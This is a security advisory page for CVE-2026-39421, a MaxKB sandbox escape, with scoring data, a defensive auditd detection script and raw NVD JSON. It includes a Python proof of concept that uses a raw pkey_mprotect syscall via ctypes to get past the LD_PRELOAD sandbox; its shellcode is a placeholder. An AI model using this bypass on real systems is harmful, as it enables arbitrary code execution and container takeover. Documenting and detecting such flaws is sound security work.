Security Vulnerability Report
CVE-2026-39421 CVSS 6.3 MEDIUM

Published: 2026-04-14 01:16:05
Last Modified: 2026-04-20 17:35:05

Description

MaxKB is an open-source AI assistant for enterprise. Versions 2.7.1 and below contain a sandbox escape vulnerability in the ToolExecutor component. By leveraging Python's ctypes library to execute raw system calls, an authenticated attacker with workspace privileges can bypass the LD_PRELOAD-based sandbox.so module to achieve arbitrary code execution via direct kernel system calls, enabling full network exfiltration and container compromise. The library intercepts critical standard system functions such as execve, system, connect, and open. It also intercepts mprotect to prevent PROT_EXEC (executable memory) allocations within the sandboxed Python processes, but pkey_mprotect is not blocked. This issue has been fixed in version 2.8.0.
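A detection sketch for the bypass described above, added here as an example and not taken from MaxKB or the advisory: because the hooks live in user space, calls have to be observed at the kernel boundary, so this scans auditd SYSCALL records for successful `mprotect` (10) or `pkey_mprotect` (329, x86_64) calls that grant PROT_EXEC from a Python process. The function names, the `comm_prefix` parameter, the `execmem` rule key and the abridged sample records are assumptions constructed for illustration.

```python
import re

# x86_64 syscall numbers; audit records carry arch=c000003e for this ABI.
SYS_MPROTECT, SYS_PKEY_MPROTECT = 10, 329
PROT_EXEC = 0x4
WATCHED = {SYS_MPROTECT: "mprotect", SYS_PKEY_MPROTECT: "pkey_mprotect"}
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_record(line):
    """Return the key=value fields of one auditd record as a dict."""
    return {key: value.strip('"') for key, value in FIELD.findall(line)}


def exec_memory_events(lines, comm_prefix="python"):
    """Yield (pid, syscall, addr, length) for each successful call that grants
    PROT_EXEC from a process whose comm starts with comm_prefix (hypothetical knob)."""
    for line in lines:
        rec = parse_record(line)
        if rec.get("type") != "SYSCALL" or rec.get("arch") != "c000003e":
            continue
        name = WATCHED.get(int(rec.get("syscall", -1)))
        if name is None or rec.get("success") != "yes":
            continue
        # auditd prints a0..a3 as bare hex; a2 is the prot argument of both calls.
        if not int(rec["a2"], 16) & PROT_EXEC:
            continue
        if rec.get("comm", "").startswith(comm_prefix):
            yield int(rec["pid"]), name, int(rec["a0"], 16), int(rec["a1"], 16)


# Constructed, abridged sample records (not captured from a real host).
SAMPLE = [
    'type=SYSCALL msg=audit(1776130000.101:901): arch=c000003e syscall=329 success=yes exit=0 a0=55d0c8a41000 a1=1000 a2=7 a3=0 pid=4217 uid=1001 comm="python3" exe="/usr/bin/python3.11" key="execmem"',
    'type=SYSCALL msg=audit(1776130000.102:902): arch=c000003e syscall=10 success=yes exit=0 a0=7f3a0fe00000 a1=1000 a2=1 a3=0 pid=4217 uid=1001 comm="python3" exe="/usr/bin/python3.11" key="execmem"',
    'type=SYSCALL msg=audit(1776130000.103:903): arch=c000003e syscall=329 success=no exit=-13 a0=55d0c8a42000 a1=1000 a2=7 a3=0 pid=4217 uid=1001 comm="python3" exe="/usr/bin/python3.11" key="execmem"',
    'type=SYSCALL msg=audit(1776130000.104:904): arch=c000003e syscall=10 success=yes exit=0 a0=7f11aa000000 a1=1000 a2=5 a3=0 pid=812 uid=33 comm="nginx" exe="/usr/sbin/nginx" key="execmem"',
    'type=SYSCALL msg=audit(1776130000.105:905): arch=c000003e syscall=10 success=yes exit=0 a0=7f3a10000000 a1=2000 a2=5 a3=0 pid=4217 uid=1001 comm="python3" exe="/usr/bin/python3.11" key="execmem"',
]

if __name__ == "__main__":
    for pid, name, addr, length in exec_memory_events(SAMPLE):
        print(f"pid={pid} {name} granted PROT_EXEC on {addr:#x} (+{length:#x})")
```

A `pkey_mprotect` hit from an interpreter process is rare enough to alert on directly; `mprotect` hits may also come from legitimate JIT or FFI code and need triage.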

CVSS Details

CVSS Score: 6.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:maxkb:maxkb:*:*:*:*:-:*:*:* - VULNERABLE
MaxKB <= 2.7.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Proof of Concept for CVE-2026-39421
# This PoC demonstrates bypassing the LD_PRELOAD sandbox using ctypes and pkey_mprotect.
import ctypes

# Constants for x86_64 architecture
SYS_pkey_mprotect = 329
PROT_READ = 0x1
PROT_WRITE = 0x2
PROT_EXEC = 0x4

# Shellcode placeholder (e.g., execve /bin/sh)
shellcode = b"\x90\x90\x90\x90"  # Replace with actual shellcode

# Allocate memory buffer
buffer_size = len(shellcode)

# Use ctypes to create a writable, page-aligned buffer
libc = ctypes.CDLL(None)
libc.valloc.restype = ctypes.c_void_p  # the default int restype would truncate the pointer
libc.valloc.argtypes = [ctypes.c_size_t]
addr = ctypes.c_void_p(libc.valloc(buffer_size))

# Write shellcode to memory
ctypes.memmove(addr, shellcode, buffer_size)

# Bypass sandbox by using raw syscall for pkey_mprotect instead of mprotect
# Arguments: addr, size, prot, pkey (ignored usually if default)
# PROT_READ | PROT_WRITE | PROT_EXEC = 7
print(f"[*] Attempting to change memory protection at {hex(addr.value)}...")

# Execute raw system call via libc syscall wrapper
# Note: syscall number depends on architecture (329 for pkey_mprotect on x86_64)
# Arguments are passed as explicit ctypes values so the 64-bit address is not truncated
result = libc.syscall(
    ctypes.c_long(SYS_pkey_mprotect),
    addr,
    ctypes.c_size_t(buffer_size),
    ctypes.c_int(PROT_READ | PROT_WRITE | PROT_EXEC),
    ctypes.c_int(0),
)

if result == 0:
    print("[+] Memory protection changed successfully! Bypass successful.")
    # Cast to function pointer and execute (Theoretical execution)
    func = ctypes.cast(addr, ctypes.CFUNCTYPE(None))
    print("[!] Executing shellcode...")
    # func()  # Uncomment to actually execute
else:
    print(f"[-] Failed to change protection: {result}")
```

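References

Patch: https://github.com/1Panel-dev/MaxKB/commit/479701a4d2e6059506bad0057a66bed91abb5aef
Release Notes: https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0
Vendor Advisory: https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-9c6w-j7w5-3gf7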

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39421", "sourceIdentifier": "[email protected]", "published": "2026-04-14T01:16:04.690", "lastModified": "2026-04-20T17:35:05.397", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MaxKB is an open-source AI assistant for enterprise. Versions 2.7.1 and below contain a sandbox escape vulnerability in the ToolExecutor component. By leveraging Python's ctypes library to execute raw system calls, an authenticated attacker with workspace privileges can bypass the LD_PRELOAD-based sandbox.so module to achieve arbitrary code execution via direct kernel system calls, enabling full network exfiltration and container compromise. The library intercepts critical standard system functions such as execve, system, connect, and open. It also intercepts mprotect to prevent PROT_EXEC (executable memory) allocations within the sandboxed Python processes, but pkey_mprotect is not blocked. This issue has been fixed in version 2.8.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": 
"Primary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:maxkb:maxkb:*:*:*:*:-:*:*:*", "versionEndExcluding": "2.8.0", "matchCriteriaId": "8BB376B6-4E9C-4801-9D33-5BF858C857D2"}]}]}], "references": [{"url": "https://github.com/1Panel-dev/MaxKB/commit/479701a4d2e6059506bad0057a66bed91abb5aef", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-9c6w-j7w5-3gf7", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}